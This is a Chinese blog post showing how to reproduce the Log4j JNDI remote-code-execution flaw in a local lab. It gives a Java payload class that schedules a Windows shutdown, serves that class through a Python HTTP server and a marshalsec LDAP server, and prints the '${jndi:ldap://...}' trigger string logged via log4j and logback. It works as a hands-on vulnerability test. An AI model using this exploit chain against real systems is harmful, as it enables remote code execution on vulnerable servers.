Log4j 漏洞测试

Log4j 漏洞测试紧跟潮流，介绍在windows下进行 Log4j 漏洞测试，linux上步骤也都一样。1、参照项目，项目地址:https://github.com/mbechler/marshalsec克隆代码到本地，mvn clean package -DskipTests打包，target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar2、新建一个普通的 j

我是个农民

54361人浏览 · 2021-12-12 12:04:42

我是个农民 · 2021-12-12 12:04:42 发布

Log4j 漏洞测试

紧跟潮流，介绍在windows下进行 Log4j 漏洞测试，linux上步骤也都一样。

1、参照项目，项目地址: https://github.com/mbechler/marshalsec

克隆代码到本地，mvn clean package -DskipTests打包，target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar

2、新建一个普通的 java 类，等会将此类注入到待测试的项目中。可以随便写逻辑（生成文件、定时关机等）

示例：功能是在windows系统下，3600秒后关机

import java.io.File;
import java.io.IOException;

/**
 * @author rxf113
 */
public class InjectClass {
    public InjectClass() {
        try {
            Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "Shutdown.exe -s -t 3600"});
            //  new File(System.getProperty("user.dir") + "\\" + System.currentTimeMillis() + ".txt").createNewFile();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }


    public static void main(String[] args) {
        new InjectClass();
    }
}

3、对上面的类执行 javac 编译，然后启动一个http 服务器，能通过服务器访问到编译后的 class 文件

示例：使用python，我编译后的class文件在F:\log4j2-test\src\main\java目录下。在 cmd窗口运行以下命令

 python -m http.server 9011 -d  F:\log4j2-test\src\main\java

如果成功，浏览器访问 http://127.0.0.1:9011/InjectClass.class 就能下载到class文件。

4、新打开一个 cmd 窗口启动第一步打包好的jar包。

参照命令：

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer <codebase>#<class> [<port>]

示例：启动 LDAPSERVER，后面的路径是上一步的 class 路径

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:9011/#InjectClass"

启动成功后：控制台会输出监听的端口为：1389

请添加图片描述

所需的步骤全部做完了，接下来开始测试

1、运行本地待测试的项目。使用 log4j 打印日志

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * @author rxf113
 */
public class Start {

    private static final Logger logger = LogManager.getLogger(Start.class);

    public static void main(String[] args) {
        //看了下其他大佬，高版本得手动设置trustURLCodebase为true
        boolean trustURLCodebase = Boolean.parseBoolean(System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase"));
        if (!trustURLCodebase) {
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        }
        logger.error("${jndi:ldap://127.0.0.1:1389/InjectClass}");
    }
}

运行成功后可以看到，定时关机命令已被执行，十分可怕。shutdown -a 取消定时关机

请添加图片描述

2、再试试 logback 的方式

//import org.apache.logging.log4j.LogManager;
//import org.apache.logging.log4j.Logger;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * @author rxf113
 */
public class Start {

   // private static final Logger logger = LogManager.getLogger(Start.class);
    private static final Logger logger = LoggerFactory.getLogger(Start.class);


    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/InjectClass}");
    }
}